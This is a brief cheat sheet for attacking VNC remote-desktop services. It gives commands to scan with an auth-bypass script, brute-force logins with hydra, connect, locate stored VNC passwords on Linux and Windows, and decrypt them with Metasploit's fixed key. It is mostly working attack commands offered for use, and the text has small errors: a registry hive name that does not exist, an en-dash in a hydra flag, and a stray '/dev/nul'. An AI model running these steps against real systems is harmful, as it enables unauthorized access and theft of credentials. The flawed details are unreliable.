VNC 5800,5801,5900,5901

1. Scans

nmap -sV --script vnc-info,realvnc-auth-bypass,vnc-title -v -p <PORT> <IP>

2. Brute force

hydra -L <USERS_LIST> –P <PASSWORDS_LIST> -s <PORT> <IP> vnc -u -vV

3. Connect

vncviewer <IP>:<PORT>

4. Found VNC Password

• Linux

Default password is stored in: ~/.vnc/passwd

• Windows

# RealVNC HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\vncserver

# TightVNC HKEY_CURRENT_USER\Software\TightVNC\Server

# TigerVNC HKEY_LOCAL_USER\Software\TigerVNC\WinVNC4

# UltraVNC C:\Program Files\UltraVNC\ultravnc.ini

• Decrypt VNC Password

msfconsole irb fixedkey = "\x17\x52\x6b\x06\x23\x4e\x58\x07" require 'rex/proto/rfb' Rex::Proto::RFB::Cipher.decrypt ["2151D3722874AD0C"].pack('H*'), fixedkey /dev/nul